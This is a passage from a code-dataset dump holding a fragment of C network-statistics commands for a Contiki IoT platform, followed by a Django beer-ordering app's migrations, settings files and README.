uip_stat.tcp.syndrop);\n\tADD2BUF(NULL, \"\\t\\\"synrst\\\": \\\"%d\\\"\\n\", uip_stat.tcp.synrst);\n\tADD2BUF(NULL, \"}\\n}\");\n\treturn n;\n#else\n\treturn snprintf(buf, buflen, \"TCP_NOT_ENABLED\");\n#endif\n}\n\nint cmd_nd6_stats(uint16_t id, char *buf, int buflen)\n{\n NOT_IMPLEMENTED;\n#if 0\n\tint n=0;\n\tADD2BUF(NULL, \"{ \\\"nd6_stats\\\": {\\n\");\n\tADD2BUF(NULL, \"\\t\\\"rcvd\\\": \\\"%d\\\",\\n\", uip_stat.nd6.recv);\n\tADD2BUF(NULL, \"\\t\\\"sent\\\": \\\"%d\\\",\\n\", uip_stat.nd6.sent);\n\tADD2BUF(NULL, \"\\t\\\"drop\\\": \\\"%d\\\"\\n\", uip_stat.nd6.drop);\n\tADD2BUF(NULL, \"}\\n}\");\n\treturn n;\n#endif\n}\n\nint cmd_config_info(uint16_t id, char *buf, int buflen)\n{\n\tint n=0;\n\tADD2BUF(NULL, \"{ \\\"config\\\": {\\n\");\n\tADD2BUF(NULL, \"\\t\\\"rttable_maxsz\\\": \\\"%d\\\",\\n\", UIP_DS6_ROUTE_NB);\n\tADD2BUF(NULL, \"\\t\\\"nbrtable_maxsz\\\": \\\"%d\\\"\\n\", NBR_TABLE_MAX_NEIGHBORS);\n\tADD2BUF(NULL, \"}\\n}\");\n\treturn n;\n}\n\nint cmd_route_table(uint16_t id, char *buf, int buflen)\n{\n int n=0;\n FILE *fp=NULL;\n\n if(buf && buf[0]) {\n fp = fopen(buf, \"wt\");\n if(!fp) {\n ADD2BUF(fp, \"cmd_route_table: COULD NOT WRITE TO FILE:<%s>\\n\", buf);\n ERROR(\"cmd_route_table: COULD NOT WRITE TO FILE:<%s>\\n\", buf);\n return n;\n }\n }\n //LOCK();\n ADD2BUF(fp, \"{ \\\"route_table\\\": {\\n\");\n ADD2BUF(fp, \"\\t\\\"routes\\\": [\\n\");\n n += get_route_list(fp, buf+n, buflen-n);\n ADD2BUF(fp, \"]\\n}}\");\n //UNLOCK();\n if(fp) {\n fclose(fp);\n ADD2BUF(NULL, \"SUCCESS\");\n }\n return n;\n}\n\n"
},
{
"alpha_fraction": 0.6306954622268677,
"alphanum_fraction": 0.6414868235588074,
"avg_line_length": 20.384614944458008,
"blob_id": "da6c4deeb70c0174586201b3913a5d449bb77bff",
"content_id": "63d537d939ff7946fc3beee436eef792ea361ddc",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 834,
"license_type": "permissive",
"max_line_length": 71,
"num_lines": 39,
"path": "/arch/platform/whitefield/command.h",
"repo_name": "philok93/IoTIDS",
"src_encoding": "UTF-8",
"text": "#ifndef\t_COMMAND_H_\n#define\t_COMMAND_H_\n\n#include <stdio.h>\n#include <string.h>\n\n#include \"contiki.h\"\n#include \"net/packetbuf.h\"\n#include \"net/netstack.h\"\n#include \"os/net/routing/rpl-classic/rpl-private.h\"\n#include \"os/net/ipv6/uip.h\"\n#include \"os/net/link-stats.h\"\n\n#include \"net/ipv6/uip-ds6-route.h\"\n\n#include \"net/ipv6/uip-sr.h\"\n\n#define INFO printf\n#define ERROR printf\n\n#define ADD2BUF(FP, ...) \\\n{\\\n FILE *mylocfp = (FP);\\\n if(mylocfp) {\\\n fprintf(mylocfp, __VA_ARGS__);\\\n } else {\\\n n += snprintf(buf+n, buflen-n, __VA_ARGS__); \\\n }\\\n}\n\nint uip_ipaddr_to_str(const uip_ipaddr_t *addr, char *buf, int buflen);\n\nint cmd_def_route(uint16_t id, char *buf, int buflen);\n\nint cmd_rtsize(uint16_t id, char *buf, int buflen);\n\nint get_route_list(FILE *fp, char *buf, int buflen);\n\n#endif //_COMMAND_H_\n"
}
] | 20 |
amatt13/Feer-Club | https://github.com/amatt13/Feer-Club | 6b4b6afa4188aa67c4853ac1b80ce3e2fedf3cf8 | 5165501b21752db3796148c305cec5416783a8c7 | c6716c2186d99d36fd5006bc06e236236ea30817 | refs/heads/master | 2021-01-13T14:36:39.584534 | 2016-05-02T12:31:13 | 2016-05-02T12:31:13 | 72,865,708 | 0 | 0 | Apache-2.0 | 2016-11-04T16:31:34 | 2016-11-04T16:31:36 | 2022-07-04T07:16:25 | Python | [
{
"alpha_fraction": 0.5134255290031433,
"alphanum_fraction": 0.5809601545333862,
"avg_line_length": 36.81538391113281,
"blob_id": "2622992fe6d88bbd67e9b3aa243af27d85cd9f8f",
"content_id": "c54bb7d93152cab2210616e8b92642f56c8748ed",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2458,
"license_type": "permissive",
"max_line_length": 128,
"num_lines": 65,
"path": "/feer_club/feer/migrations/0018_auto_20160402_1503.py",
"repo_name": "amatt13/Feer-Club",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9.1 on 2016-04-02 13:03\nfrom __future__ import unicode_literals\n\nimport datetime\nfrom django.db import migrations, models\nfrom django.utils.timezone import utc\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('feer', '0017_auto_20160402_1229'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='beer',\n name='created',\n field=models.DateTimeField(auto_now_add=True, default=datetime.datetime(2016, 4, 2, 13, 2, 31, 578232, tzinfo=utc)),\n preserve_default=False,\n ),\n migrations.AddField(\n model_name='beer',\n name='updated',\n field=models.DateTimeField(auto_now=True, default=datetime.datetime(2016, 4, 2, 13, 2, 42, 186093, tzinfo=utc)),\n preserve_default=False,\n ),\n migrations.AddField(\n model_name='order',\n name='created',\n field=models.DateTimeField(auto_now_add=True, default=datetime.datetime(2016, 4, 2, 13, 3, 14, 39186, tzinfo=utc)),\n preserve_default=False,\n ),\n migrations.AddField(\n model_name='order',\n name='updated',\n field=models.DateTimeField(auto_now=True, default=datetime.datetime(2016, 4, 2, 13, 3, 16, 30779, tzinfo=utc)),\n preserve_default=False,\n ),\n migrations.AddField(\n model_name='orderitem',\n name='created',\n field=models.DateTimeField(auto_now_add=True, default=datetime.datetime(2016, 4, 2, 13, 3, 17, 232609, tzinfo=utc)),\n preserve_default=False,\n ),\n migrations.AddField(\n model_name='orderitem',\n name='updated',\n field=models.DateTimeField(auto_now=True, default=datetime.datetime(2016, 4, 2, 13, 3, 18, 336149, tzinfo=utc)),\n preserve_default=False,\n ),\n migrations.AddField(\n model_name='rating',\n name='created',\n field=models.DateTimeField(auto_now_add=True, default=datetime.datetime(2016, 4, 2, 13, 3, 19, 415807, tzinfo=utc)),\n preserve_default=False,\n ),\n migrations.AddField(\n model_name='rating',\n name='updated',\n field=models.DateTimeField(auto_now=True, default=datetime.datetime(2016, 4, 2, 13, 3, 20, 447692, tzinfo=utc)),\n preserve_default=False,\n ),\n ]\n"
},
{
"alpha_fraction": 0.5220588445663452,
"alphanum_fraction": 0.6004902124404907,
"avg_line_length": 20.473684310913086,
"blob_id": "f94c8573bb08f1ec0fa7c572488f94f00bf95641",
"content_id": "9bb8ebb4b9b81cd5440c58a4435ba702bb38bfd8",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 408,
"license_type": "permissive",
"max_line_length": 47,
"num_lines": 19,
"path": "/feer_club/feer/migrations/0016_remove_orderitem_volume_per_participant.py",
"repo_name": "amatt13/Feer-Club",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9.1 on 2016-02-27 15:39\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('feer', '0015_auto_20160206_2305'),\n ]\n\n operations = [\n migrations.RemoveField(\n model_name='orderitem',\n name='volume_per_participant',\n ),\n ]\n"
},
{
"alpha_fraction": 0.5656028389930725,
"alphanum_fraction": 0.6223404407501221,
"avg_line_length": 24.636363983154297,
"blob_id": "a2403ba649259f2f6ea767f4765fd10517137828",
"content_id": "897d9071f30bee7eb72341ff6ef20d56c20ca885",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 564,
"license_type": "permissive",
"max_line_length": 97,
"num_lines": 22,
"path": "/feer_club/feer/migrations/0007_orderitem_drink_date.py",
"repo_name": "amatt13/Feer-Club",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9.1 on 2016-01-16 20:50\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport django.utils.timezone\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('feer', '0006_auto_20160116_2137'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='orderitem',\n name='drink_date',\n field=models.DateField(default=django.utils.timezone.now, verbose_name='drink date'),\n preserve_default=False,\n ),\n ]\n"
},
{
"alpha_fraction": 0.5384615659713745,
"alphanum_fraction": 0.7179487347602844,
"avg_line_length": 18.5,
"blob_id": "7109e75e6777efa7fb6358fbcc21da5f55a026d2",
"content_id": "c6de9f09552f95f360246581ad062cfca6f672ea",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 39,
"license_type": "permissive",
"max_line_length": 24,
"num_lines": 2,
"path": "/requirements.txt",
"repo_name": "amatt13/Feer-Club",
"src_encoding": "UTF-8",
"text": "Django==1.9.1\ndjango-bootstrap3==6.2.2\n"
},
{
"alpha_fraction": 0.5114678740501404,
"alphanum_fraction": 0.5848624110221863,
"avg_line_length": 20.799999237060547,
"blob_id": "4cb3ac88a3360509069d90f68a32a877fbaaa81a",
"content_id": "32dd6a944cae3fcf26bd6b188dc93fc77c86389c",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 436,
"license_type": "permissive",
"max_line_length": 47,
"num_lines": 20,
"path": "/feer_club/feer/migrations/0013_auto_20160206_1855.py",
"repo_name": "amatt13/Feer-Club",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9.1 on 2016-02-06 17:55\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('feer', '0012_auto_20160206_1329'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='rating',\n name='index',\n field=models.IntegerField(),\n ),\n ]\n"
},
{
"alpha_fraction": 0.5872092843055725,
"alphanum_fraction": 0.6162790656089783,
"avg_line_length": 25.461538314819336,
"blob_id": "b518c8c1aad93c5dc69c486f0c52213ba304c42d",
"content_id": "732d311a1e5df217c41687d3967e4b796c3265d3",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 688,
"license_type": "permissive",
"max_line_length": 70,
"num_lines": 26,
"path": "/feer_club/feer/migrations/0008_auto_20160120_1326.py",
"repo_name": "amatt13/Feer-Club",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9.1 on 2016-01-20 12:26\nfrom __future__ import unicode_literals\n\nfrom django.conf import settings\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('feer', '0007_orderitem_drink_date'),\n ]\n\n operations = [\n migrations.RemoveField(\n model_name='orderitem',\n name='participants',\n ),\n migrations.AddField(\n model_name='orderitem',\n name='participants',\n field=models.ManyToManyField(to=settings.AUTH_USER_MODEL),\n ),\n ]\n"
},
{
"alpha_fraction": 0.557986855506897,
"alphanum_fraction": 0.6017505526542664,
"avg_line_length": 21.850000381469727,
"blob_id": "a0c8942a1b9f8cb6f8e51b5a8f8176100be3660c",
"content_id": "0046cb105b8e19928481c0fcb9c4b653fba4cdad",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 457,
"license_type": "permissive",
"max_line_length": 52,
"num_lines": 20,
"path": "/feer_club/feer/migrations/0020_order_updatedable.py",
"repo_name": "amatt13/Feer-Club",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9.1 on 2016-05-01 13:46\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('feer', '0019_order_remainding_balance'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='order',\n name='updatedable',\n field=models.BooleanField(default=True),\n ),\n ]\n"
},
{
"alpha_fraction": 0.5492845773696899,
"alphanum_fraction": 0.5755167007446289,
"avg_line_length": 27.590909957885742,
"blob_id": "d9678eca602694c8bc33f0321618f1250b8d33b3",
"content_id": "9deb42a37ec0cbf37e899482f9aa8710ec8fad1c",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1258,
"license_type": "permissive",
"max_line_length": 121,
"num_lines": 44,
"path": "/feer_club/feer/migrations/0012_auto_20160206_1329.py",
"repo_name": "amatt13/Feer-Club",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9.1 on 2016-02-06 12:29\nfrom __future__ import unicode_literals\n\nfrom django.conf import settings\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('feer', '0011_auto_20160206_1305'),\n ]\n\n operations = [\n migrations.RemoveField(\n model_name='profile',\n name='reviews',\n ),\n migrations.RemoveField(\n model_name='profile',\n name='user',\n ),\n migrations.RemoveField(\n model_name='rating',\n name='profile',\n ),\n migrations.AddField(\n model_name='beer',\n name='ratings',\n field=models.ManyToManyField(through='feer.Rating', to=settings.AUTH_USER_MODEL),\n ),\n migrations.AddField(\n model_name='rating',\n name='user',\n field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),\n preserve_default=False,\n ),\n migrations.DeleteModel(\n name='Profile',\n ),\n ]\n"
},
{
"alpha_fraction": 0.698019802570343,
"alphanum_fraction": 0.698019802570343,
"avg_line_length": 29.076923370361328,
"blob_id": "0653791edd11a92c55ccbeb4f15e08c74ecaf7a1",
"content_id": "2843fda551d925d70c1f51ae75eb14da6422fdc2",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 404,
"license_type": "permissive",
"max_line_length": 64,
"num_lines": 13,
"path": "/feer_club/feer_club/settings/prod.py",
"repo_name": "amatt13/Feer-Club",
"src_encoding": "UTF-8",
"text": "from __future__ import absolute_import # optional, but I like it\r\nfrom .common import *\r\n\r\nwith open('/home/django/Feer-Club/secret_key.txt') as f:\r\n SECRET_KEY = f.read().strip()\r\nDEBUG = False\r\nALLOWED_HOSTS = ['*']\r\nSESSION_COOKIE_SECURE = True\r\nCSRF_COOKIE_SECURE = True\r\nCSRF_COOKIE_HTTPONLY = True\r\nX_FRAME_OPTIONS = 'DENY'\r\nSECURE_BROWSER_XSS_FILTER = True\r\nSECURE_CONTENT_TYPE_NOSNIFF = True\r\n"
},
{
"alpha_fraction": 0.664383590221405,
"alphanum_fraction": 0.664383590221405,
"avg_line_length": 22.33333396911621,
"blob_id": "3998f941065ab4e13ed60dcdce2f41bea52d4bff",
"content_id": "971af64de257e420f2a88bebdd937ec05654e235",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 146,
"license_type": "permissive",
"max_line_length": 64,
"num_lines": 6,
"path": "/feer_club/feer_club/settings/dev.py",
"repo_name": "amatt13/Feer-Club",
"src_encoding": "UTF-8",
"text": "from __future__ import absolute_import # optional, but I like it\r\nfrom .common import *\r\n\r\nSECRET_KEY = '#+l0-i%us49hj6w663c_797d%hd2xq#@dioc__s&j947srp!p4'\r\nDEBUG = True\r\nALLOWED_HOSTS = []\r\n"
},
{
"alpha_fraction": 0.5303326845169067,
"alphanum_fraction": 0.5694715976715088,
"avg_line_length": 21.217391967773438,
"blob_id": "16becb1c1edad4c32a6d43b63aae73a2dcf349ac",
"content_id": "d584190de4bc7b71be099f0dbfc90ab676b0f68b",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 511,
"license_type": "permissive",
"max_line_length": 65,
"num_lines": 23,
"path": "/feer_club/feer/migrations/0017_auto_20160402_1229.py",
"repo_name": "amatt13/Feer-Club",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9.1 on 2016-04-02 10:29\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('feer', '0016_remove_orderitem_volume_per_participant'),\n ]\n\n operations = [\n migrations.RemoveField(\n model_name='order',\n name='cost',\n ),\n migrations.RemoveField(\n model_name='orderitem',\n name='cost',\n ),\n ]\n"
},
{
"alpha_fraction": 0.533923327922821,
"alphanum_fraction": 0.5899705290794373,
"avg_line_length": 26.1200008392334,
"blob_id": "63af6835820a513244d88a60133f3771fcddeda2",
"content_id": "9b890c21f33f6c26b7ed58c79a7956dc3a1336e5",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 678,
"license_type": "permissive",
"max_line_length": 81,
"num_lines": 25,
"path": "/feer_club/feer/migrations/0022_auto_20160501_1646.py",
"repo_name": "amatt13/Feer-Club",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9.1 on 2016-05-01 14:46\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('feer', '0021_auto_20160501_1551'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='order',\n name='cost_for_free_shipping',\n field=models.DecimalField(decimal_places=2, default=0, max_digits=6),\n ),\n migrations.AddField(\n model_name='order',\n name='shipping_fee',\n field=models.DecimalField(decimal_places=2, default=0, max_digits=6),\n ),\n ]\n"
},
{
"alpha_fraction": 0.6896551847457886,
"alphanum_fraction": 0.6896551847457886,
"avg_line_length": 41.5,
"blob_id": "2ffa2d8d181920b32578a977eaf70fbfc6154942",
"content_id": "1638c660f3e01d239de65ace84697fe97c35ed5c",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 87,
"license_type": "permissive",
"max_line_length": 45,
"num_lines": 2,
"path": "/feer_club/feer_club/settings/__init__.py",
"repo_name": "amatt13/Feer-Club",
"src_encoding": "UTF-8",
"text": "from __future__ import absolute_import\r\nfrom .dev import * # or .dev if you want dev\r\n"
},
{
"alpha_fraction": 0.56379634141922,
"alphanum_fraction": 0.5839095115661621,
"avg_line_length": 35.15909194946289,
"blob_id": "7745eabb757d0c9d585b6d7dc07c5092c79ae8ef",
"content_id": "70ccaf69b4fb213c1da5afc3a5a335742bac942b",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1591,
"license_type": "permissive",
"max_line_length": 114,
"num_lines": 44,
"path": "/feer_club/feer/migrations/0011_auto_20160206_1305.py",
"repo_name": "amatt13/Feer-Club",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9.1 on 2016-02-06 12:05\nfrom __future__ import unicode_literals\n\nfrom django.conf import settings\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('feer', '0010_auto_20160120_2232'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Profile',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ],\n ),\n migrations.CreateModel(\n name='Rating',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('index', models.FloatField()),\n ('comment', models.TextField(default='')),\n ('beer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='feer.Beer')),\n ('profile', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='feer.Profile')),\n ],\n ),\n migrations.AddField(\n model_name='profile',\n name='reviews',\n field=models.ManyToManyField(through='feer.Rating', to='feer.Beer'),\n ),\n migrations.AddField(\n model_name='profile',\n name='user',\n field=models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),\n ),\n ]\n"
},
{
"alpha_fraction": 0.5359342694282532,
"alphanum_fraction": 0.6078028678894043,
"avg_line_length": 23.350000381469727,
"blob_id": "00a7c74b9d885dca4dadd2f850b83c0cc649a3a6",
"content_id": "e0b7931be55fdaed5690939d36db1a9c9a528e1e",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 487,
"license_type": "permissive",
"max_line_length": 81,
"num_lines": 20,
"path": "/feer_club/feer/migrations/0019_order_remainding_balance.py",
"repo_name": "amatt13/Feer-Club",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9.1 on 2016-04-23 11:57\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('feer', '0018_auto_20160402_1503'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='order',\n name='remainding_balance',\n field=models.DecimalField(decimal_places=2, default=0, max_digits=6),\n ),\n ]\n"
},
{
"alpha_fraction": 0.5541125535964966,
"alphanum_fraction": 0.5974025726318359,
"avg_line_length": 22.100000381469727,
"blob_id": "73de39468694a276cab73f9b7f04a80a6fbc88ba",
"content_id": "c334b0fb1b19259a58cdb2968767142e639abc99",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 462,
"license_type": "permissive",
"max_line_length": 62,
"num_lines": 20,
"path": "/feer_club/feer/migrations/0003_auto_20160114_1836.py",
"repo_name": "amatt13/Feer-Club",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9.1 on 2016-01-14 17:36\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('feer', '0002_orderlist_name'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='orderlist',\n name='order_date',\n field=models.DateField(verbose_name='order date'),\n ),\n ]\n"
},
{
"alpha_fraction": 0.5381882786750793,
"alphanum_fraction": 0.5537300109863281,
"avg_line_length": 39.21428680419922,
"blob_id": "8ab11158a25dacad67e83b0d3a34bb134d7ebbd0",
"content_id": "31c47e0396e53346966666540b490b9690a43bec",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2252,
"license_type": "permissive",
"max_line_length": 114,
"num_lines": 56,
"path": "/feer_club/feer/migrations/0001_initial.py",
"repo_name": "amatt13/Feer-Club",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9.1 on 2016-01-14 17:29\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Beer',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('name', models.CharField(max_length=512)),\n ('brewery', models.CharField(max_length=512)),\n ('country', models.CharField(max_length=512)),\n ('style', models.CharField(max_length=512)),\n ('abv', models.FloatField()),\n ('ibu', models.IntegerField()),\n ('volume', models.IntegerField()),\n ('purchase_url', models.URLField(max_length=512)),\n ('price', models.DecimalField(decimal_places=2, max_digits=6)),\n ],\n ),\n migrations.CreateModel(\n name='OrderItem',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('quantity', models.IntegerField()),\n ('participants', models.IntegerField()),\n ('volume_per_participant', models.FloatField()),\n ('beer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='feer.Beer')),\n ],\n ),\n migrations.CreateModel(\n name='OrderList',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('order_date', models.DateTimeField(verbose_name='order date')),\n ('cost', models.DecimalField(decimal_places=2, max_digits=6)),\n ('beers', models.ManyToManyField(through='feer.OrderItem', to='feer.Beer')),\n ],\n ),\n migrations.AddField(\n model_name='orderitem',\n name='order_list',\n field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='feer.OrderList'),\n ),\n ]\n"
},
{
"alpha_fraction": 0.7024456262588501,
"alphanum_fraction": 0.73097825050354,
"avg_line_length": 34,
"blob_id": "62c87953f69bcf3c3c6db1c3bcad31ae0e9de7e7",
"content_id": "9c726fb369b13072ccea3d50da1755d3e8dc0602",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 736,
"license_type": "permissive",
"max_line_length": 211,
"num_lines": 21,
"path": "/README.md",
"repo_name": "amatt13/Feer-Club",
"src_encoding": "UTF-8",
"text": "# Feer-Club\nManage Them Beers\n\n## Getting started\n\n- Install python3\n- `pip install -r requirements.txt`\n- `cd feer_club/`\n- `python manage.py runserver`\n- `python manage.py createsuperuser` to create a user\n- Go to `http://127.0.0.1:8000/admin` for admin page\n- Go to `http://127.0.0.1:8000/feer` for beers! Cheers!\n\n### Seeding the Database\nThe `feer` app has fixtures for a number of models in the `fixtures` directory in the `feer` app. Load these using\n\n `python manage.py loaddata <fixture>`\n \n## Contributing\n\nIf you find any bugs or have any suggestions, please submit an issue in the issue tracker and provide an appropriate tag. If you want the issue to be resolved within a reasonable time frame, make a pull request.\n\n"
},
{
"alpha_fraction": 0.5305164456367493,
"alphanum_fraction": 0.577464759349823,
"avg_line_length": 20.299999237060547,
"blob_id": "3534d8b4298dffbc9756522aa52f6e7d40bdf2fa",
"content_id": "a249b37a4a9eea74df171855f9d0f3c575b32ffd",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 426,
"license_type": "permissive",
"max_line_length": 47,
"num_lines": 20,
"path": "/feer_club/feer/migrations/0006_auto_20160116_2137.py",
"repo_name": "amatt13/Feer-Club",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9.1 on 2016-01-16 20:37\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('feer', '0005_orderitem_cost'),\n ]\n\n operations = [\n migrations.RenameField(\n model_name='orderitem',\n old_name='order_list',\n new_name='order',\n ),\n ]\n"
},
{
"alpha_fraction": 0.7419354915618896,
"alphanum_fraction": 0.7419354915618896,
"avg_line_length": 16.714284896850586,
"blob_id": "93d59da39b206a9182c9fb78eeecd1676681a631",
"content_id": "6b19870f34a363bbbff40029135ea6669e63bcf3",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 124,
"license_type": "permissive",
"max_line_length": 39,
"num_lines": 7,
"path": "/feer_club/feer/apps.py",
"repo_name": "amatt13/Feer-Club",
"src_encoding": "UTF-8",
"text": "from __future__ import unicode_literals\n\nfrom django.apps import AppConfig\n\n\nclass FeerConfig(AppConfig):\n name = 'feer'\n"
},
{
"alpha_fraction": 0.5302144289016724,
"alphanum_fraction": 0.5984405279159546,
"avg_line_length": 23.428571701049805,
"blob_id": "95a8b42ce123a9455c123fa2ce1a8bdc0ab0239e",
"content_id": "b132d6ff05693bf15fc8bcc68a32a8b4ea7ca729",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 513,
"license_type": "permissive",
"max_line_length": 81,
"num_lines": 21,
"path": "/feer_club/feer/migrations/0005_orderitem_cost.py",
"repo_name": "amatt13/Feer-Club",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9.1 on 2016-01-16 12:44\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('feer', '0004_auto_20160114_1844'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='orderitem',\n name='cost',\n field=models.DecimalField(decimal_places=2, default=0, max_digits=6),\n preserve_default=False,\n ),\n ]\n"
},
{
"alpha_fraction": 0.5158371329307556,
"alphanum_fraction": 0.5882353186607361,
"avg_line_length": 21.100000381469727,
"blob_id": "5acff8561b3d5e9d4d9d9de19bc5ff78c5bb15da",
"content_id": "b227768b5bf244d44a9a590840b51490fa0914e5",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 442,
"license_type": "permissive",
"max_line_length": 50,
"num_lines": 20,
"path": "/feer_club/feer/migrations/0009_auto_20160120_2229.py",
"repo_name": "amatt13/Feer-Club",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9.1 on 2016-01-20 21:29\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('feer', '0008_auto_20160120_1326'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='beer',\n name='ibu',\n field=models.IntegerField(blank=True),\n ),\n ]\n"
},
{
